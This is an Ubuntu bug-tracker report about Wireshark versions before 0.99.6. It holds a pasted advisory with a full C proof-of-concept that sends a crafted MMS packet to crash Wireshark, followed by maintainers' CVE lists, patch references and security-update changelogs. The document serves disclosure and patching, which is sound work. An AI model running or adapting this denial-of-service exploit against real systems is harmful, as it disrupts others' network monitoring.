Ubuntu
wireshark package

WireShark versions prior to 0.99.6 vulnerability

Bug #132915 reported by Kyle M Weller
258
Affects Status Importance Assigned to Milestone
wireshark (Ubuntu)
Fix Released
High
Stephan Rügamer
Declined for Dapper by Kees Cook
Edgy
Fix Released
High
Stephan Rügamer
Feisty
Fix Released
High
Stephan Rügamer

Bug Description

Update WireShark in repo's to 0.99.6 or newer

pasted page from securiteam...
http://www.securiteam.com/securitynews/5YP0B1PMAW.html
Vulnerable Systems:
* WireShark versions prior to 0.99.6

Immune Systems:
* WireShark version 0.99.6

WireShark parsing a MMS message whose Content-Type is application/vnd.wap.multipart.mixed, and the header length of a multipart content equals to 0x00, will cause it to crash.

Solution:
Update to WireShark version 0.99.6

Exploit:
//main.cpp
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32")

char *http =
"POST / HTTP/1.0\r\n"
"Content-Type: application/vnd.wap.mms-message\r\n";

char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";

unsigned char mms[] =
{
0x8c,0x80,//X-Mms-Message-Type: m-send-req(0x80)
0x98,0x7a,0x77,0x65,0x6c,0x6c,0x00,//X-Mms-Transaction-ID: zwell
0x8d,0x92,//X-Mms-MMS-Version: 1.2
0x97,0x31,0x33,0x35,0x31,0x30,0x30,0x30,0x30,0x30, 0x30,0x30,0x00,//To: 13510000000
0x84,0xa3,//Content-Type: application/vnd.wap.multipart.mixed
//////////////////////////////////////////////////
0x01,//multipart,count
0x0f,//HeadersLen
0x05,//DataLen
0x00,//headlen <<<=== If this is 0x00, then wireshark will be crash. The real value is the follow three lines bytes which is 0x0e
///
0x83,0x85,//Utf-8
0x7a,0x77,0x65,0x6c,0x6c,0x2e,0x74,0x78,0x74,0x00,// Name: zwell.txt
0x81,0xea,//Charset: utf-8
///
0x7a,0x77,0x65,0x6c,0x6c,//zwell
};

SOCKET connect_to_host(char *h, int p)
{
SOCKET sock;
struct hostent *host;
struct sockaddr_in saddr;

if((host=gethostbyname(h))==NULL)
{
printf("resolv host %s error\n", h);
exit(-1);
}

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
{
printf("create socket error\n");
exit(-1);
}
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
{
printf("connect to host %s on port %d error\n", h, p);
exit(-1);
}

return sock;
}

void socket_init()
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2,0), &wsaData);
}

int main(int argc, char **argv)
{
SOCKET s;
char sendbuf[1024];
int len = 0;

printf("WireShark<0.99.6 MMS protocol DOS PoC\nCoded By ZwelL\nhttp://www.nosec.org\n");
if(argc != 3)
{
printf("usage : %s <host> <port>\n", argv[0]);
exit(-1);
}
socket_init();
s = connect_to_host(argv[1], atoi(argv[2]));

strcpy(&sendbuf[len], http);
len += strlen(http);

sprintf(&sendbuf[len], hoststr, argv[1], atoi(argv[2]));
len = strlen(sendbuf);

sprintf(&sendbuf[len], contentlenstr, sizeof(mms));
len = strlen(sendbuf);

memcpy(&sendbuf[len], mms, sizeof(mms));
len += sizeof(mms);

send(s, sendbuf, len, 0);

printf("completed!\n");

return 0;
}

Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Well, this is only one of them.....

here is the complete list with fixes...I'm preparing some debdiffs from dapper to feisty. gutsy is clean.

  * SECURITY UPDATE: wireshark has several vulnerabilities:
    + CVE-2007-3389: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service (crash) via a crafted chunked encoding in an HTTP
      response, possibly related to a zero-length payload.
    + CVE-2007-3390: Wireshark 0.99.5 and 0.10.x up to 0.10.14, when running
      on certain systems, allows remote attackers to cause a denial of service
      (crash) via crafted iSeries capture files that trigger a SIGTRAP.
    + CVE-2007-3392: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service via malformed (1) SSL or (2) MMS packets that trigger an
      infinite loop.
    + CVE-2007-3393: Off-by-one error in the DHCP/BOOTP dissector in Wireshark
      before 0.99.6 allows remote attackers to cause a denial of service (crash) via
      crafted DHCP-over-DOCSIS packets.
  * debian/patches/12_secu_0.99.6_r21034.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-http.c?view=log&pathrev=21034)
  * debian/patches/12_secu_0.99.6_r20990.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/wiretap/iseries.c?r1=19814&r2=20990&pathrev=20990)
  * debian/patches/12_secu_0.99.6_r21392.dpatch ,
    12_secu_0.99.6_r21665.dpatch:
    - applied patches from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-ssl.c?r1=21650&r2=21665&pathrev=21665&view=patch)
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-mms.c?r1=21088&r2=21392&pathrev=21392&view=patch)
  * debian/patches/12_secu_0.99.6_r21947.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-bootp.c?r1=21924&r2=21947&pathrev=21947&view=patch)
  * References:
    CVE-2007-3389
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394
    CVE-2007-3390
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1415
    CVE-2007-3392
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1342
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1582
    CVE-2007-3393
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1416

Changed in wireshark:
assignee: nobody → shermann
status: New → In Progress
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

in dapper wireshark was still named ethereal

Michael Bienia (geser)
Changed in wireshark:
importance: Undecided → High
Revision history for this message
William Grant (wgrant) wrote :

Fixed in Gutsy/Hardy by the autosync.

Changed in wireshark:
assignee: nobody → shermann
importance: Undecided → High
status: New → In Progress
assignee: nobody → shermann
importance: Undecided → High
status: New → In Progress
status: In Progress → Fix Released
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Found another CVE hanging:

CVE-2007-4721:
Integer signedness error in the DNP3 dissector in
Wireshark 0.99.5 and earlier allows remote attackers to cause a denial of
service (infinite loop) via a certain DNP3 packet.

The fix is quite easy, reading the explanation on http://archives.neohapsis.com/archives/bugtraq/2007-09/0030.html:

- guint16 al_obj, temp16=0, al_val16=0, al_ctlobj_stat;
- guint32 al_val32, num_items=0, al_ptaddr=0, al_ctlobj_on, al_ctlobj_off;
+ guint16 al_obj, al_val16=0, al_ctlobj_stat;
+ guint32 al_val32, num_items=0, al_ptaddr=0, al_ctlobj_on, al_ctlobj_off, temp16=0;

PLease have a look at temp16...before it, it was a unsigned 16bit int, but it needs to be a unsigned 32bit int.

Revision history for this message
Stephan Rügamer (sruegamer) wrote :
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

for edgy all CVEs from 0.99.5 downto 0.99.4 are valid and additionally the following:
CVE-2006-4805
CVE-2006-4574
CVE-2006-5469
CVE-2006-5740
CVE-2006-5468

Revision history for this message
William Grant (wgrant) wrote :

\sh, there are another 4 CVEs affecting Edgy on bug #86908. Additionally, I believe that CVE-2007-3391 affects Edgy and Feisty. ubuntu-cve confirms that that is all of them.

Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Hi,

no CVE-2007-3391 doesn't affect 0.99.4 and 0.99.3a in feisty and edgy.
The fix is only valid for 0.99.5 which isn't in gutsy, feisty, edgy.

Revision history for this message
Stephan Rügamer (sruegamer) wrote :

Edgy is still affected by:
CVE-2007-0456
CVE-2007-0457
CVE-2007-0458
CVE-2007-0459

which will be fixed by the new debdiff of edgy...

Those CVEs are mentioned as well in #86908
\sh

Revision history for this message
Stephan Rügamer (sruegamer) wrote :
Revision history for this message
Kees Cook (kees) wrote :

These looks good. Thanks for digging out all the patches! I've uploaded these to the security queue; they should be published shortly.

Changed in wireshark:
status: In Progress → Fix Committed
status: In Progress → Fix Committed
Revision history for this message
Stephan Rügamer (sruegamer) wrote :

wireshark (0.99.4-6ubuntu0.1) feisty-security; urgency=low

  * SECURITY UPDATE: wireshark has several vulnerabilities:
    (LP: #132915)
    + CVE-2007-3389: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service (crash) via a crafted chunked encoding in an HTTP
      response, possibly related to a zero-length payload.
    + CVE-2007-3390: Wireshark 0.99.5 and 0.10.x up to 0.10.14, when running
      on certain systems, allows remote attackers to cause a denial of service
      (crash) via crafted iSeries capture files that trigger a SIGTRAP.
    + CVE-2007-3392: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service via malformed (1) SSL or (2) MMS packets that trigger an
      infinite loop.
    + CVE-2007-3393: Off-by-one error in the DHCP/BOOTP dissector in Wireshark
      before 0.99.6 allows remote attackers to cause a denial of service (crash) via
      crafted DHCP-over-DOCSIS packets.
    + CVE-2007-4721: Integer signedness error in the DNP3 dissector in
      Wireshark 0.99.5 and earlier allows remote attackers to cause a denial of
      service (infinite loop) via a certain DNP3 packet.
  * debian/patches/12_secu_0.99.6_r21034.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-http.c?view=log&pathrev=21034)
  * debian/patches/12_secu_0.99.6_r20990.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/wiretap/iseries.c?r1=19814&r2=20990&pathrev=20990)
  * debian/patches/12_secu_0.99.6_r21392.dpatch ,
    12_secu_0.99.6_r21665.dpatch:
    - applied patches from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-ssl.c?r1=21650&r2=21665&pathrev=21665&view=patch)
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-mms.c?r1=21088&r2=21392&pathrev=21392&view=patch)
  * debian/patches/12_secu_0.99.6_r21947.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-bootp.c?r1=21924&r2=21947&pathrev=21947&view=patch)
  * debian/patches/13_CVE-2007-4721.dpatch:
    - Applied patch according to the explanation on bugtraq.
      (Link: http://archives.neohapsis.com/archives/bugtraq/2007-09/0030.html)
  * References:
    CVE-2007-3389
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394
    CVE-2007-3390
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1415
    CVE-2007-3392
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1342
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1582
    CVE-2007-3393
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1416
    CVE-2007-4721
    http://archives.neohapsis.com/archives/bugtraq/2007-09/0030.html

 -- Stephan Hermann <email address hidden> Thu, 15 Nov 2007 20:45:17 +0100

Changed in wireshark:
status: Fix Committed → Fix Released
Kees Cook (kees)
Changed in wireshark:
status: Fix Committed → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.